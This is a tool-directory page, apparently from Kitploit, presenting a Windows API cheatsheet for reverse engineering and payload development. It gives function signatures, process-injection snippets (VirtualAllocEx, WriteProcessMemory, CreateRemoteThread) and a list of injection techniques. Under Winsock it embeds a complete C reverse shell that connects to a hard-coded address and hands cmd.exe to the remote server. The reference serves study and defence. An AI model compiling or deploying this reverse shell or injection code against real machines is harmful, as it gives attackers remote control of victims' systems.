Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
windows-api-function-cheatsheets — Une référence des appels de fonctions de l'API Windows, incluant des fonctions pour les opérations sur les fichiers, la gestion des processus, la gestion de la mémoire, la gestion des threads, la gestion des bibliothèques de liens dynamiques (DLL), la synchronisation, la communication interprocessus, la manipulation des chaînes Unicode, la gestion des erreurs, les opérations réseau Winsock et les opérations de registre. | Kitploit
Outils/GitHubGitHub/7etsuo/windows-api-function-cheatsheets
Rétro-ingénieriePost-ExploitationAnalyse de MalwareAnalyse de BinairesRessources OrganiséesDéveloppement de Charges Utiles
GitHub7etsuo/windows-api-function-cheatsheets

windows-api-function-cheatsheets

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
1.5k1695il y a 1 anVérifié par Kitploit

À propos

Une référence des appels de fonctions de l'API Windows, incluant des fonctions pour les opérations sur les fichiers, la gestion des processus, la gestion de la mémoire, la gestion des threads, la gestion des bibliothèques de liens dynamiques (DLL), la synchronisation, la communication interprocessus, la manipulation des chaînes Unicode, la gestion des erreurs, les opérations réseau Winsock et les opérations de registre.

Partager

Aide-mémoire API

Aide-mémoire des fonctions de l'API Windows

Contact

🌨️ Tetsuo: https://www.x.com/tetsuo

Table des matières

  • Aide-mémoire des fonctions de l'API Windows
    • Opérations sur les fichiers
    • Gestion des processus
    • Gestion de la mémoire
    • Gestion des threads
    • Gestion des bibliothèques de liens dynamiques (DLL)
    • Synchronisation
    • Communication interprocessus
    • Hooks Windows
    • Cryptographie
    • Débogage
    • Winsock
    • Opérations sur le registre
    • Gestion des erreurs
    • Gestion des ressources
    • Fonctions de chaînes Unicode
      • Longueur de chaîne
      • Copie de chaîne
      • Concaténation de chaîne
      • Comparaison de chaînes
      • Recherche de chaîne
      • Classification et conversion des caractères
    • Aide-mémoire des structures Win32
      • Structures courantes
      • Aide-mémoire des structures sockets Win32 (winsock.h)
      • Aide-mémoire des structures sockets Win32 (winsock2.h)
      • Aide-mémoire des structures sockets Win32 (ws2def.h)
  • Techniques d'injection de code
    • 1. Injection de DLL
    • 2. Injection de PE
    • 3. Injection réflective
    • 4. Injection APC
    • 5. Évidement de processus (remplacement de processus)
    • 6. AtomBombing
    • 7. Process Doppelgänging
    • 8. Process Herpaderping
    • 9. Injection par hooking
    • 10. Injection de mémoire Windows supplémentaire
    • 11. Injection Propagate
    • 12. Heap Spray
    • 13. Détournement d'exécution de thread
    • 14. Module Stomping
    • 15. Hooking de l'IAT
    • 16. Hooking inline
    • 17. Injection par débogueur
    • 18. Détournement de COM
    • 19. Évidement de DLL fantôme
    • 20. PROPagate
    • 21. Injection Early Bird
    • 22. Injection par shims
    • 23. Injection par mappage
    • 24. Empoisonnement du cache KnownDlls
  • Énumération des processus

Appels de fonctions de l'API Windows

Opérations sur les fichiers

CreateFile```c HANDLE CreateFile( LPCTSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile ); // Opens an existing file or creates a new file.

root@kitploit:~
[ReadFile](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-readfile)```c
BOOL ReadFile(
  HANDLE hFile,
  LPVOID lpBuffer,
  DWORD nNumberOfBytesToRead,
  LPDWORD lpNumberOfBytesRead,
  LPOVERLAPPED lpOverlapped
); // Reads data from the specified file.

WriteFile```c BOOL WriteFile( HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped ); // Writes data to the specified file.

root@kitploit:~
[CloseHandle](https://docs.microsoft.com/en-us/windows/win32/api/handleapi/nf-handleapi-closehandle)```c
BOOL CloseHandle(
  HANDLE hObject
); // Closes an open handle.

Gestion des processus

OpenProcess```c HANDLE OpenProcess( [in] DWORD dwDesiredAccess, [in] BOOL bInheritHandle, [in] DWORD dwProcessId ); // Opens an existing local process object. e.g., try to open target process

root@kitploit:~
```c
hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, (DWORD) pid);

CreateProcess```c HANDLE CreateProcess( LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation ); // The CreateProcess function creates a new process that runs independently of the creating process. For simplicity, this relationship is called a parent-child relationship.

root@kitploit:~
```c
// Start the child process
// No module name (use command line), Command line, Process handle not inheritable, Thread handle not inheritable, Set handle inheritance to FALSE, No creation flags, Use parent's environment block, Use parent's starting directory, Pointer to STARTUPINFO structure, Pointer to PROCESS_INFORMATION structure
CreateProcess( NULL, argv[1], NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); 

WinExec```c UINT WinExec( [in] LPCSTR lpCmdLine, [in] UINT uCmdShow ); // Runs the specified application.

root@kitploit:~
```c
result = WinExec(L"C:\\Windows\\System32\\cmd.exe", SW_SHOWNORMAL);

TerminateProcess```c BOOL TerminateProcess( HANDLE hProcess, UINT uExitCode ); // Terminates the specified process.

root@kitploit:~
[ExitWindowsEx](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-exitwindowsex)```c
BOOL ExitWindowsEx(
  [in] UINT  uFlags,
  [in] DWORD dwReason
); // Logs off the interactive user, shuts down the system, or shuts down and restarts the system.
root@kitploit:~
bResult = ExitWindowsEx(EWX_REBOOT, SHTDN_REASON_MAJOR_APPLICATION);

CreateToolhelp32Snapshot```c HANDLE CreateToolhelp32Snapshot( [in] DWORD dwFlags, [in] DWORD th32ProcessID ); // used to obtain information about processes and threads running on a Windows system.

root@kitploit:~
[Process32First](https://learn.microsoft.com/en-us/windows/win32/api/tlhelp32/nf-tlhelp32-process32first)```c
BOOL Process32First(
  [in]      HANDLE           hSnapshot,
  [in, out] LPPROCESSENTRY32 lppe
); // used to retrieve information about the first process encountered in a system snapshot, which is typically taken using the CreateToolhelp32Snapshot function.

Process32Next```c BOOL Process32Next( [in] HANDLE hSnapshot, [out] LPPROCESSENTRY32 lppe ); // used to retrieve information about the next process in a system snapshot after Process32First has been called. This function is typically used in a loop to enumerate all processes captured in a snapshot taken using the CreateToolhelp32Snapshot function.

root@kitploit:~
[WriteProcessMemory](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory)```c
BOOL WriteProcessMemory(
  [in]  HANDLE  hProcess,
  [in]  LPVOID  lpBaseAddress,
  [in]  LPCVOID lpBuffer,
  [in]  SIZE_T  nSize,
  [out] SIZE_T  *lpNumberOfBytesWritten
); // Writes data to an area of memory in a specified process. The entire area to be written to must be accessible or the operation fails.
root@kitploit:~
WriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T *)NULL); // pRemoteCode from VirtualAllocEx

ReadProcessMemory```c BOOL ReadProcessMemory( [in] HANDLE hProcess, [in] LPCVOID lpBaseAddress, [out] LPVOID lpBuffer, [in] SIZE_T nSize, [out] SIZE_T *lpNumberOfBytesRead ); // ReadProcessMemory copies the data in the specified address range from the address space of the specified process into the specified buffer of the current process.

root@kitploit:~
```c
bResult = ReadProcessMemory(pHandle, (void*)baseAddress, &address, sizeof(address), 0);

Gestion de la mémoire

VirtualAlloc```c LPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, // Shellcode must be between 0x1 and 0x10000 bytes (page size) DWORD flAllocationType, // #define MEM_COMMIT 0x00001000 DWORD flProtect // #define PAGE_EXECUTE_READWRITE 0x00000040
); // Reserves, commits, or changes the state of a region of memory within the virtual address space of the calling process.

root@kitploit:~
[VirtualAllocEx](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex)```c
LPVOID VirtualAllocEx(
  [in]           HANDLE hProcess,
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
); // Reserves, commits, or changes the state of a region of memory within the virtual address space of a specified process. The function initializes the memory it allocates to zero.
root@kitploit:~
pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);

VirtualFree```c BOOL VirtualFree( LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType ); // Releases, decommits, or releases and decommits a region of memory within the virtual address space of the calling process.

root@kitploit:~
[Fonction VirtualProtect (memoryapi.h)](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect)```c
BOOL VirtualProtect(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flNewProtect,
  PDWORD lpflOldProtect
); // Changes the protection on a region of committed pages in the virtual address space of the calling process.

RtlMoveMemory```c VOID RtlMoveMemory( Out VOID UNALIGNED *Destination, In const VOID UNALIGNED *Source, In SIZE_T Length ); // Copies the contents of a source memory block to a destination memory block, and supports overlapping source and destination memory blocks.

root@kitploit:~
### Gestion des threads
[CreateThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread)```c
HANDLE CreateThread(
  [in, optional]  LPSECURITY_ATTRIBUTES   lpThreadAttributes,         // A pointer to a SECURITY_ATTRIBUTES structure that specifies a security descriptor for the new thread and determines whether child processes can inherit the returned handle.
  [in]            SIZE_T                  dwStackSize,                // The initial size of the stack, in bytes.
  [in]            LPTHREAD_START_ROUTINE  lpStartAddress,             // A pointer to the application-defined function of type LPTHREAD_START_ROUTINE
  [in, optional]  __drv_aliasesMem LPVOID lpParameter,                // A pointer to a variable to be passed to the thread function.
  [in]            DWORD                   dwCreationFlags,            // The flags that control the creation of the thread.
  [out, optional] LPDWORD                 lpThreadId                  // A pointer to a variable that receives the thread identifier. If this parameter is NULL, the thread identifier is not returned.
); // Creates a thread to execute within the virtual address space of the calling process.
root@kitploit:~
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); WaitForSingleObject(th, 0);

CreateRemoteThread```c HANDLE CreateRemoteThread( [in] HANDLE hProcess, [in] LPSECURITY_ATTRIBUTES lpThreadAttributes, [in] SIZE_T dwStackSize, [in] LPTHREAD_START_ROUTINE lpStartAddress, [in] LPVOID lpParameter, [in] DWORD dwCreationFlags, [out] LPDWORD lpThreadId ); // Creates a thread that runs in the virtual address space of another process.

root@kitploit:~
```c
hThread = CreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, NULL); // pRemoteCode from VirtualAllocEx filled by WriteProcessMemory

CreateRemoteThreadEx```c HANDLE CreateRemoteThreadEx( [in] HANDLE hProcess, [in, optional] LPSECURITY_ATTRIBUTES lpThreadAttributes, [in] SIZE_T dwStackSize, [in] LPTHREAD_START_ROUTINE lpStartAddress, [in, optional] LPVOID lpParameter, [in] DWORD dwCreationFlags, [in, optional] LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList, [out, optional] LPDWORD lpThreadId ); // Creates a thread that runs in the virtual address space of another process and optionally specifies extended attributes such as processor group affinity. // See InitializeProcThreadAttributeList

root@kitploit:~
```c
hThread = CreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, lpAttributeList, NULL); // pRemoteCode from VirtualAllocEx filled by WriteProcessMemory

ExitThread```c VOID ExitThread( DWORD dwExitCode ); // Terminates the calling thread and returns the exit code to the operating system.

root@kitploit:~
[GetExitCodeThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getexitcodethread)```c
BOOL GetExitCodeThread(
  HANDLE hThread,
  LPDWORD lpExitCode
); // Retrieves the termination status of the specified thread.

ResumeThread```c DWORD ResumeThread( HANDLE hThread ); // Decrements a thread's suspend count. When the suspend count is decremented to zero, the execution of the thread is resumed.

root@kitploit:~
[SuspendThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-suspendthread)```c
DWORD SuspendThread(
  HANDLE hThread
); // Suspends the specified thread.

TerminateThread```c BOOL TerminateThread( HANDLE hThread, DWORD dwExitCode ); // Terminates the specified thread.

root@kitploit:~
[CloseHandle](https://docs.microsoft.com/en-us/windows/win32/api/handleapi/nf-handleapi-closehandle)```c
BOOL CloseHandle(
  HANDLE hObject
); // Closes an open handle.

Gestion des bibliothèques de liens dynamiques (DLL)

LoadLibrary```c HMODULE LoadLibrary( LPCTSTR lpFileName ); // Loads a dynamic-link library (DLL) module into the address space of the calling process.

root@kitploit:~
[LoadLibraryExA](https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexa)```c
HMODULE LoadLibraryExA(
  [in] LPCSTR lpLibFileName,
       HANDLE hFile,
  [in] DWORD  dwFlags
); // Loads the specified module into the address space of the calling process, with additional options.
root@kitploit:~
HMODULE hModule = LoadLibraryExA("ws2_32.dll", NULL, LOAD_LIBRARY_SAFE_CURRENT_DIRS);

GetProcAddress```c FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName ); // Retrieves the address of an exported function or variable from the specified DLL.

root@kitploit:~
```c
pLoadLibrary = (PTHREAD_START_ROUTINE) GetProcAddress(GetModuleHandle("Kernel32.dll"), "LoadLibraryA");

FreeLibrary```c BOOL FreeLibrary( HMODULE hModule ); // Frees the loaded DLL module and, if necessary, decrements its reference count.

root@kitploit:~
### Synchronisation
[CreateMutex](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createmutexa)```c
HANDLE CreateMutex(
  LPSECURITY_ATTRIBUTES lpMutexAttributes,
  BOOL bInitialOwner,
  LPCTSTR lpName
); // Creates a named or unnamed mutex object.

CreateSemaphore```c HANDLE CreateSemaphore( LPSECURITY_ATTRIBUTES lpSemaphoreAttributes, LONG lInitialCount, LONG lMaximumCount, LPCTSTR lpName ); // Creates a named or unnamed semaphore object.

root@kitploit:~
[ReleaseMutex](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-releasemutex)```c
BOOL ReleaseMutex(
  HANDLE hMutex
); // Releases ownership of the specified mutex object.

ReleaseSemaphore```c BOOL ReleaseSemaphore( HANDLE hSemaphore, LONG lReleaseCount, LPLONG lpPreviousCount ); // Increases the count of the specified semaphore object by a specified amount.

root@kitploit:~
[WaitForSingleObject](https://learn.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)```c
DWORD WaitForSingleObject(
  [in] HANDLE hHandle,
  [in] DWORD  dwMilliseconds
); // Waits until the specified object is in the signaled state or the time-out interval elapses.
root@kitploit:~
WaitForSingleObject(hThread, 500);

Communication entre processus

CreatePipe```c BOOL CreatePipe( PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize ); // Creates an anonymous pipe and returns handles to the read and write ends of the pipe.

root@kitploit:~
[CreateNamedPipe](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createnamedpipea)```c
HANDLE CreateNamedPipe(
  LPCTSTR lpName,
  DWORD dwOpenMode,
  DWORD dwPipeMode,
  DWORD nMaxInstances,
  DWORD nOutBufferSize,
  DWORD nInBufferSize,
  DWORD nDefaultTimeOut,
  LPSECURITY_ATTRIBUTES lpSecurityAttributes
); // Creates a named pipe and returns a handle for subsequent pipe operations.

ConnectNamedPipe```c BOOL ConnectNamedPipe( HANDLE hNamedPipe, LPOVERLAPPED lpOverlapped ); // Enables a named pipe server process to wait for a client process to connect to an instance of a named pipe.

root@kitploit:~
[DisconnectNamedPipe](https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-disconnectnamedpipe)```c
BOOL DisconnectNamedPipe(
  HANDLE hNamedPipe
); // Disconnects the server end of a named pipe instance from a client process.

CreateFileMapping```c HANDLE CreateFileMapping( HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCTSTR lpName ); // Creates or opens a named or unnamed file mapping object for a specified file.

root@kitploit:~
[MapViewOfFile](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-mapviewoffile)```c
LPVOID MapViewOfFile(
  HANDLE hFileMappingObject,
  DWORD dwDesiredAccess,
  DWORD dwFileOffsetHigh,
  DWORD dwFileOffsetLow,
  SIZE_T dwNumberOfBytesToMap
); // Maps a view of a file mapping into the address space of the calling process.

UnmapViewOfFile```c BOOL UnmapViewOfFile( LPCVOID lpBaseAddress ); // Unmaps a mapped view of a file from the calling process's address space.

root@kitploit:~
[CloseHandle](https://docs.microsoft.com/en-us/windows/win32/api/handleapi/nf-handleapi-closehandle)```c
BOOL CloseHandle(
  HANDLE hObject
); // Closes an open handle.

Hooks Windows

SetWindowsHookExA```c HHOOK SetWindowsHookExA( [in] int idHook, [in] HOOKPROC lpfn, [in] HINSTANCE hmod, [in] DWORD dwThreadId ); // Installs an application-defined hook procedure into a hook chain. You would install a hook procedure to monitor the system for certain types of events. These events are associated either with a specific thread or with all threads in the same desktop as the calling thread.

root@kitploit:~
[CallNextHookEx](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-callnexthookex)```c
LRESULT CallNextHookEx(
  [in, optional] HHOOK  hhk,
  [in]           int    nCode,
  [in]           WPARAM wParam,
  [in]           LPARAM lParam
); // Passes the hook information to the next hook procedure in the current hook chain. A hook procedure can call this function either before or after processing the hook information.

UnhookWindowsHookEx```c BOOL UnhookWindowsHookEx( [in] HHOOK hhk ); // Removes a hook procedure installed in a hook chain by the SetWindowsHookEx function.

root@kitploit:~
[GetAsyncKeyState](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getasynckeystate)```c
SHORT GetAsyncKeyState(
  [in] int vKey
); // Determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.

GetKeyState```c SHORT GetKeyState( [in] int nVirtKey ); // Retrieves the status of the specified virtual key. The status specifies whether the key is up, down, or toggled (on, off—alternating each time the key is pressed).

root@kitploit:~
[GetKeyboardState](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getkeyboardstate)```c
BOOL GetKeyboardState(
  [out] PBYTE lpKeyState
); // Copies the status of the 256 virtual keys to the specified buffer.

Cryptographie

CryptBinaryToStringA```c BOOL CryptBinaryToStringA( [in] const BYTE *pbBinary, [in] DWORD cbBinary, [in] DWORD dwFlags, [out, optional] LPSTR pszString, [in, out] DWORD *pcchString ); // The CryptBinaryToString function converts an array of bytes into a formatted string.

root@kitploit:~
[CryptDecrypt](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptdecrypt)```c
BOOL CryptDecrypt(
  [in]      HCRYPTKEY  hKey,
  [in]      HCRYPTHASH hHash,
  [in]      BOOL       Final,
  [in]      DWORD      dwFlags,
  [in, out] BYTE       *pbData,
  [in, out] DWORD      *pdwDataLen
); // The CryptDecrypt function decrypts data previously encrypted by using the CryptEncrypt function.

CryptEncrypt```c BOOL CryptEncrypt( [in] HCRYPTKEY hKey, [in] HCRYPTHASH hHash, [in] BOOL Final, [in] DWORD dwFlags, [in, out] BYTE *pbData, [in, out] DWORD *pdwDataLen, [in] DWORD dwBufLen ); // The CryptEncrypt function encrypts data. The algorithm used to encrypt the data is designated by the key held by the CSP module and is referenced by the hKey parameter.

root@kitploit:~
[CryptDecryptMessage](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptdecryptmessage)```c
BOOL CryptDecryptMessage(
  [in]                PCRYPT_DECRYPT_MESSAGE_PARA pDecryptPara,
  [in]                const BYTE                  *pbEncryptedBlob,
  [in]                DWORD                       cbEncryptedBlob,
  [out, optional]     BYTE                        *pbDecrypted,
  [in, out, optional] DWORD                       *pcbDecrypted,
  [out, optional]     PCCERT_CONTEXT              *ppXchgCert
); // The CryptDecryptMessage function decodes and decrypts a message.

CryptEncryptMessage```c BOOL CryptEncryptMessage( [in] PCRYPT_ENCRYPT_MESSAGE_PARA pEncryptPara, [in] DWORD cRecipientCert, [in] PCCERT_CONTEXT [] rgpRecipientCert, [in] const BYTE *pbToBeEncrypted, [in] DWORD cbToBeEncrypted, [out] BYTE *pbEncryptedBlob, [in, out] DWORD *pcbEncryptedBlob ); // The CryptEncryptMessage function encrypts and encodes a message.

root@kitploit:~
### Débogage
[IsDebuggerPresent](https://learn.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-isdebuggerpresent)```c
BOOL IsDebuggerPresent(); // Determines whether the calling process is being debugged by a user-mode debugger.

CheckRemoteDebuggerPresent```c BOOL CheckRemoteDebuggerPresent( [in] HANDLE hProcess, [in, out] PBOOL pbDebuggerPresent ); // Determines whether the specified process is being debugged.

root@kitploit:~
[OutputDebugStringA](https://learn.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-outputdebugstringa)```c
void OutputDebugStringA(
  [in, optional] LPCSTR lpOutputString
); // Sends a string to the debugger for display.

Winsock```c

/*** Windows Reverse Shell *

  • ██████ ███▄ █ ▒█████ █ █░ ▄████▄ ██▀███ ▄▄▄ ██████ ██░ ██
  • ▒██ ▒ ██ ▀█ █ ▒██▒ ██▒▓█░ █ ░█░▒██▀ ▀█ ▓██ ▒ ██▒▒████▄ ▒██ ▒ ▓██░ ██▒
  • ░ ▓██▄ ▓██ ▀█ ██▒▒██░ ██▒▒█░ █ ░█ ▒▓█ ▄ ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▓██▄ ▒██▀▀██░
  • ▒ ██▒▓██▒ ▐▌██▒▒██ ██░░█░ █ ░█ ▒▓▓▄ ▄██▒▒██▀▀█▄ ░██▄▄▄▄██ ▒ ██▒░▓█ ░██
  • ▒██████▒▒▒██░ ▓██░░ ████▓▒░░░██▒██▓ ▒ ▓███▀ ░░██▓ ▒██▒ ▓█ ▓██▒▒██████▒▒░▓█▒░██▓
  • ▒ ▒▓▒ ▒ ░░ ▒░ ▒ ▒ ░ ▒░▒░▒░ ░ ▓░▒ ▒ ░ ░▒ ▒ ░░ ▒▓ ░▒▓░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒
  • ░ ░▒ ░ ░░ ░░ ░ ▒░ ░ ▒ ▒░ ▒ ░ ░ ░ ▒ ░▒ ░ ▒░ ▒ ▒▒ ░░ ░▒ ░ ░ ▒ ░▒░ ░
  • ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░
  • root@kitploit:~
      ░           ░     ░ ░      ░    ░ ░         ░           ░  ░      ░   ░  ░  ░
    
  • root@kitploit:~
                                  Written by: [email protected] (snowcra5h) 2023
    
  • This program establishes a reverse shell via the Winsock2 library. It is
  • designed to establish a connection to a specified remote server, and execute commands
  • received from the server on the local machine, giving the server
  • control over the local machine.
  • Compile command (using MinGW on Wine):
  • wine gcc.exe windows.c -o windows.exe -lws2_32
  • This code is intended for educational and legitimate penetration testing purposes only.
  • Please use responsibly and ethically.

*/

#include <winsock2.h> #include <ws2tcpip.h> #include <stdio.h> #include <windows.h> #include <process.h>

const char* const PORT = "1337"; const char* const IP = "10.37.129.2";

typedef struct { HANDLE hPipeRead; HANDLE hPipeWrite; SOCKET sock; } ThreadParams;

DWORD WINAPI OutputThreadFunc(LPVOID data); DWORD WINAPI InputThreadFunc(LPVOID data); void CleanUp(HANDLE hInputWrite, HANDLE hInputRead, HANDLE hOutputWrite, HANDLE hOutputRead, PROCESS_INFORMATION processInfo, addrinfo* result, SOCKET sock);

int main(int argc, char** argv) { WSADATA wsaData; int err = WSAStartup(MAKEWORD(2, 2), &wsaData); if (err != 0) { fprintf(stderr, "WSAStartup failed: %d\n", err); return 1; }

root@kitploit:~
SOCKET sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, WSA_FLAG_OVERLAPPED);
if (sock == INVALID_SOCKET) {
    fprintf(stderr, "Socket function failed with error = %d\n", WSAGetLastError());
    WSACleanup();
    return 1;
}

struct addrinfo hints = { 0 };
hints.ai_family = AF_INET;
hints.ai_socktype = SOCK_STREAM;
struct addrinfo* result;
err = getaddrinfo(IP, PORT, &hints, &result);
if (err != 0) {
    fprintf(stderr, "Failed to get address info: %d\n", err);
    CleanUp(NULL, NULL, NULL, NULL, { 0 }, result, sock);
    return 1;
}

if (WSAConnect(sock, result->ai_addr, (int)result->ai_addrlen, NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
    fprintf(stderr, "Failed to connect.\n");
    CleanUp(NULL, NULL, NULL, NULL, { 0 }, result, sock);
    return 1;
}

SECURITY_ATTRIBUTES sa = { sizeof(SECURITY_ATTRIBUTES), NULL, TRUE };
HANDLE hInputWrite, hOutputRead, hInputRead, hOutputWrite;
if (!CreatePipe(&hOutputRead, &hOutputWrite, &sa, 0) || !CreatePipe(&hInputRead, &hInputWrite, &sa, 0)) {
    fprintf(stderr, "Failed to create pipe.\n");
    CleanUp(NULL, NULL, NULL, NULL, { 0 }, result, sock);
    return 1;
}

STARTUPINFO startupInfo = { 0 };
startupInfo.cb = sizeof(startupInfo);
startupInfo.dwFlags = STARTF_USESTDHANDLES;
startupInfo.hStdInput = hInputRead;
startupInfo.hStdOutput = hOutputWrite;
startupInfo.hStdError = hOutputWrite;
PROCESS_INFORMATION processInfo;

WCHAR cmd[] = L"cmd.exe /k";
if (!CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &startupInfo, &processInfo)) {
    fprintf(stderr, "Failed to create process.\n");
    CleanUp(hInputWrite, hInputRead, hOutputWrite, hOutputRead, processInfo, result, sock);
    return 1;
}

CloseHandle(hInputRead);
CloseHandle(hOutputWrite);
CloseHandle(processInfo.hThread);
ThreadParams outputParams = { hOutputRead, NULL, sock };
ThreadParams inputParams = { NULL, hInputWrite, sock };
HANDLE hThread[2];
hThread[0] = CreateThread(NULL, 0, OutputThreadFunc, &outputParams, 0, NULL);
hThread[1] = CreateThread(NULL, 0, InputThreadFunc, &inputParams, 0, NULL);

WaitForMultipleObjects(2, hThread, TRUE, INFINITE);
CleanUp(hInputWrite, NULL, NULL, hOutputRead, processInfo, result, sock);
return 0;

}

void CleanUp(HANDLE hInputWrite, HANDLE hInputRead, HANDLE hOutputWrite, HANDLE hOutputRead, PROCESS_INFORMATION processInfo, addrinfo* result, SOCKET sock) { if (hInputWrite != NULL) CloseHandle(hInputWrite); if (hInputRead != NULL) CloseHandle(hInputRead); if (hOutputWrite != NULL) CloseHandle(hOutputWrite); if (hOutputRead != NULL) CloseHandle(hOutputRead); if (processInfo.hProcess != NULL) CloseHandle(processInfo.hProcess); if (processInfo.hThread != NULL) CloseHandle(processInfo.hThread); if (result != NULL) freeaddrinfo(result); if (sock != NULL) closesocket(sock); WSACleanup(); }

DWORD WINAPI OutputThreadFunc(LPVOID data) { ThreadParams* params = (ThreadParams*)data; char buffer[4096]; DWORD bytesRead; while (ReadFile(params->hPipeRead, buffer, sizeof(buffer) - 1, &bytesRead, NULL)) { buffer[bytesRead] = '\0'; send(params->sock, buffer, bytesRead, 0); } return 0; }

DWORD WINAPI InputThreadFunc(LPVOID data) { ThreadParams* params = (ThreadParams*)data; char buffer[4096]; int bytesRead; while ((bytesRead = recv(params->sock, buffer, sizeof(buffer) - 1, 0)) > 0) { DWORD bytesWritten; WriteFile(params->hPipeWrite, buffer, bytesRead, &bytesWritten, NULL); } return 0; }

root@kitploit:~
[WSAStartup](https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-wsastartup)```c
int WSAStartup(
    WORD wVersionRequired, 
    LPWSADATA lpWSAData
); // Initializes the Winsock library for an application. Must be called before any other Winsock functions.

WSAConnect```c int WSAConnect( SOCKET s, // Descriptor identifying a socket. const struct sockaddr* name, // Pointer to the sockaddr structure for the connection target. int namelen, // Length of the sockaddr structure. LPWSABUF lpCallerData, // Pointer to user data to be transferred during connection. LPWSABUF lpCalleeData, // Pointer to user data transferred back during connection. LPQOS lpSQOS, // Pointer to flow specs for socket s, one for each direction. LPQOS lpGQOS // Pointer to flow specs for the socket group. ); // Establishes a connection to another socket application.This function is similar to connect, but allows for more control over the connection process.

root@kitploit:~
[WSASend](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsasend)```c
int WSASend(
    SOCKET s, // Descriptor identifying a connected socket.
    LPWSABUF lpBuffers, // Array of buffers for data to be sent.
    DWORD dwBufferCount, // Number of buffers in the lpBuffers array.
    LPDWORD lpNumberOfBytesSent, // Pointer to the number of bytes sent by this function call.
    DWORD dwFlags, // Flags to modify the behavior of the function call.
    LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations.
    LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the send operation has been completed.
); // Sends data on a connected socket.It can be used for both synchronous and asynchronous data transfer.

